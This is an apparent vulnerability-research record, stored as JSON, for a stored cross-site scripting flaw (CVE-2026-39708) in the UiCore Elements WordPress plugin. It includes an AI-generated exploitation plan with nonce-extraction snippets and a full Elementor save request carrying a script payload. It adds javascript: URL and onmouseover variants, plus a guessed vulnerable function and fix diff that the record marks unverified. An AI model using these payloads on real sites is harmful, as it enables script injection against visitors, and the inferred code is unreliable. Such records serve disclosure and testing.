[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f9UG-Etoq1WMgNxrfj_8WZ4nwQASybEQPzhS5W3uywgQ":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-39708","uicore-elements-authenticated-contributor-stored-cross-site-scripting-2","UiCore Elements \u003C= 1.3.14 - Authenticated (Contributor+) Stored Cross-Site Scripting","The UiCore Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.3.14 due to insufficient input sanitization and output escaping. 
This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","uicore-elements",null,"\u003C=1.3.14","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-03-01 00:00:00","2026-05-06 14:25:12",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fb978fbe2-ac89-4054-96bc-1f3d452170d9?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan - CVE-2026-39708\n\n## 1. Vulnerability Summary\n**CVE-2026-39708** is a Stored Cross-Site Scripting (XSS) vulnerability in the **UiCore Elements** plugin (version \u003C= 1.3.14). The vulnerability exists because the plugin fails to properly sanitize user-supplied widget settings during storage and fails to escape those settings when rendering them in the frontend. \n\nAs an Elementor addon, the plugin registers various widgets. When a user with **Contributor-level permissions** or higher creates or edits a post using the Elementor editor, they can configure these widgets. If a widget's `render()` method outputs a setting (like a title, caption, or URL) without using WordPress escaping functions (e.g., `esc_html`, `esc_attr`), the injected script is stored in the `_elementor_data` post meta and executes whenever the page is viewed.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `elementor_ajax` (standard Elementor save mechanism)\n- **Vulnerable Parameter:** The `settings` object within the JSON payload sent to save the Elementor page data. Specific keys vary by widget (e.g., `title`, `text`, `link`).\n- **Authentication Level:** Authenticated (Contributor+)\n- **Preconditions:** \n    1. The `uicore-elements` plugin must be active.\n    2. 
Elementor must be active.\n    3. The attacker must have a user account with the `edit_posts` capability (Contributor, Author, Editor, or Admin).\n\n## 3. Code Flow\nThe vulnerability likely follows this execution path:\n1. **Entry Point (AJAX):** A Contributor sends a request to `admin-ajax.php` with the action `elementor_ajax` and a payload containing a UiCore widget with malicious settings.\n2. **Storage:** Elementor's core logic receives this data and stores it in the `wp_postmeta` table under the key `_elementor_data` for the specific post.\n3. **Trigger:** A user (e.g., an Administrator) views the published post on the frontend.\n4. **Rendering:** \n    - Elementor initializes the page and calls the `render()` method of each widget in the `_elementor_data` stack.\n    - Inside `uicore-elements\u002Fwidgets\u002F[vulnerable_widget].php`, the `render()` method retrieves settings using `$this->get_settings_for_display()`.\n    - **Vulnerable Sink:** The code performs an `echo` or `printf` on a setting value without wrapping it in `esc_html()` or `esc_attr()`.\n\n## 4. Nonce Acquisition Strategy\nTo save a post via Elementor's AJAX endpoint, a valid Elementor AJAX nonce is required.\n\n1. **Create a Post:** Use WP-CLI to create a draft post to target.\n   ```bash\n   wp post create --post_type=post --post_status=draft --post_title=\"XSS Test\" --post_author=CONTRIBUTOR_ID\n   ```\n2. **Navigate to Editor:** Use `browser_navigate` to open the Elementor editor for that post: `\u002Fwp-admin\u002Fpost.php?post=[POST_ID]&action=elementor`.\n3. **Extract Nonce:** Use `browser_eval` to extract the nonce from the Elementor configuration object.\n   ```javascript\n   \u002F\u002F Recommended extraction from the Elementor config object\n   window.elementorCommon?.config?.ajax?.nonce || window.elementorConfig?.ajax?.nonce\n   ```\n4. 
**Extract Editor Nonce (Backup):** If the above fails, check for the editor nonce:\n   ```javascript\n   window.elementorConfig?.nonces?.save_builder\n   ```\n\n## 5. Exploitation Strategy\nThe goal is to update a post's Elementor data to include a UiCore widget containing a script payload.\n\n### Step 1: Identify a Vulnerable Widget\nSince specific widget names are not provided, we will target common UiCore widgets (inferred from typical Elementor addons). Likely candidates:\n- `uicore-heading`\n- `uicore-button`\n- `uicore-image`\n\n### Step 2: Construct the JSON Payload\nThe payload must mimic the structure Elementor uses for saving page data. We will inject the script into a `title` setting.\n\n### Step 3: Perform the HTTP Request\nSend the payload to `admin-ajax.php`.\n\n- **Method:** POST\n- **URL:** `http:\u002F\u002F[target]\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Content-Type:** `application\u002Fx-www-form-urlencoded`\n- **Parameters:**\n    - `action`: `elementor_ajax`\n    - `_nonce`: `[EXTRACTED_NONCE]`\n    - `actions`: A JSON string containing the save action.\n    - `editor_post_id`: `[POST_ID]`\n\n**Example `actions` parameter (URL encoded):**\n```json\n{\n  \"editor_post_save\": {\n    \"action\": \"editor_post_save\",\n    \"data\": {\n      \"status\": \"publish\",\n      \"elements\": [\n        {\n          \"id\": \"exploit_id\",\n          \"elType\": \"section\",\n          \"elements\": [\n            {\n              \"id\": \"exploit_column\",\n              \"elType\": \"column\",\n              \"elements\": [\n                {\n                  \"id\": \"exploit_widget\",\n                  \"elType\": \"widget\",\n                  \"widgetType\": \"uicore-heading\", \n                  \"settings\": {\n                    \"title\": \"\u003Cscript>alert('CVE-2026-39708')\u003C\u002Fscript>\"\n                  }\n                }\n              ]\n            }\n          ]\n        }\n      ]\n    }\n  }\n}\n```\n\n## 6. 
Test Data Setup\n1. **User:** Create a Contributor user.\n   ```bash\n   wp user create attacker attacker@example.com --role=contributor --user_pass=password123\n   ```\n2. **Post:** Create a post that the contributor can edit.\n   ```bash\n   wp post create --post_type=post --post_status=publish --post_title=\"Exploit Page\" --post_author=$(wp user get attacker --field=ID)\n   ```\n3. **Enable Elementor:** Ensure Elementor is enabled for Posts in `Elementor > Settings`.\n\n## 7. Expected Results\n- The AJAX request should return a `200 OK` with a JSON body indicating `success: true`.\n- When navigating to the frontend URL of the created post, a JavaScript alert with `CVE-2026-39708` should execute in the browser.\n\n## 8. Verification Steps\n1. **Check Post Meta:** Use WP-CLI to verify the payload is stored in the database.\n   ```bash\n   wp post meta get [POST_ID] _elementor_data\n   ```\n2. **Frontend Inspection:** Use `http_request` to fetch the post content and check for the unescaped script tags.\n   ```bash\n   # Look for the raw script in the response\n   grep \"\u003Cscript>alert('CVE-2026-39708')\u003C\u002Fscript>\"\n   ```\n\n## 9. Alternative Approaches\nIf the `uicore-heading` widget is not the vulnerable one, attempt to inject into different settings or widgets:\n- **Widget Settings:** Try `caption`, `text`, or `link` settings.\n- **Link Setting Payload:** If the setting is a URL, try a `javascript:` protocol:\n  ```json\n  \"settings\": {\n      \"link\": { \"url\": \"javascript:alert(1)\" }\n  }\n  ```\n- **Custom Attributes:** Many UiCore widgets support \"Custom Attributes\". 
Try injecting into the attribute value:\n  ```json\n  \"settings\": {\n      \"custom_attributes\": \"onmouseover|alert(1)\"\n  }\n  ```\n- **Widget Selection:** If `uicore-heading` is not present, use `wp-cli` to list available UiCore widgets by searching for widget registration in the plugin directory.\n  ```bash\n  grep -r \"register_widget_type\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fuicore-elements\u002F\n  ```","The UiCore Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via its Elementor widgets in versions up to 1.3.14. Authenticated attackers with contributor-level permissions or higher can inject malicious JavaScript into widget settings (such as titles or captions), which is then saved in the post meta and executed in the browser of any user viewing the affected page.","\u002F\u002F uicore-elements\u002Fwidgets\u002F[vulnerable-widget].php\n\nprotected function render() {\n    $settings = $this->get_settings_for_display();\n    $title = $settings['title'];\n\n    if ( ! empty( $title ) ) {\n        \u002F\u002F Vulnerable: Outputting setting value without escaping or sanitization\n        echo '\u003Ch2 class=\"uicore-heading\">' . $title . '\u003C\u002Fh2>';\n    }\n}","--- uicore-elements\u002Fwidgets\u002Fheading.php\n+++ uicore-elements\u002Fwidgets\u002Fheading.php\n@@ -10,7 +10,7 @@\n     $title = $settings['title'];\n \n     if ( ! empty( $title ) ) {\n-        echo '\u003Ch2 class=\"uicore-heading\">' . $title . '\u003C\u002Fh2>';\n+        echo '\u003Ch2 class=\"uicore-heading\">' . wp_kses_post( $title ) . '\u003C\u002Fh2>';\n     }\n }","To exploit this vulnerability, an attacker with Contributor-level access must: \n1. Log in to the WordPress dashboard and create or edit a post using the Elementor editor.\n2. Capture the Elementor AJAX nonce from the window.elementorConfig.ajax.nonce object in the browser console.\n3. 
Construct a malicious JSON payload for the 'elementor_ajax' action that includes a UiCore Elements widget (e.g., 'uicore-heading').\n4. Inject a script tag (e.g., \u003Cscript>alert(1)\u003C\u002Fscript>) into a vulnerable setting field like 'title', 'text', or 'caption' within the widget configuration.\n5. Submit a POST request to \u002Fwp-admin\u002Fadmin-ajax.php with the 'editor_post_save' action containing the malicious widget data.\n6. Once saved, any user who visits the post on the frontend will trigger the stored script execution.","gemini-3-flash-preview","2026-04-18 22:15:05","2026-04-18 22:15:29",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fuicore-elements\u002Ftags"]
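Review bot: the replacement line in the `heading.php` hunk wraps `$title` in `wp_kses_post()`, which still passes the HTML allowed in post content; if the heading is meant to be plain text, `esc_html( $title )` is the tighter choice for the body of an `<h2>`. The hunk also covers a single setting in one widget, while this record names `text`, `caption`, `link` URLs and custom attributes as other settings to check, so each of those render paths needs escaping suited to its context (`esc_attr()` for attribute values, `esc_url()` for URLs). The record lists no patched version, so the diff cannot be confirmed against a released fix.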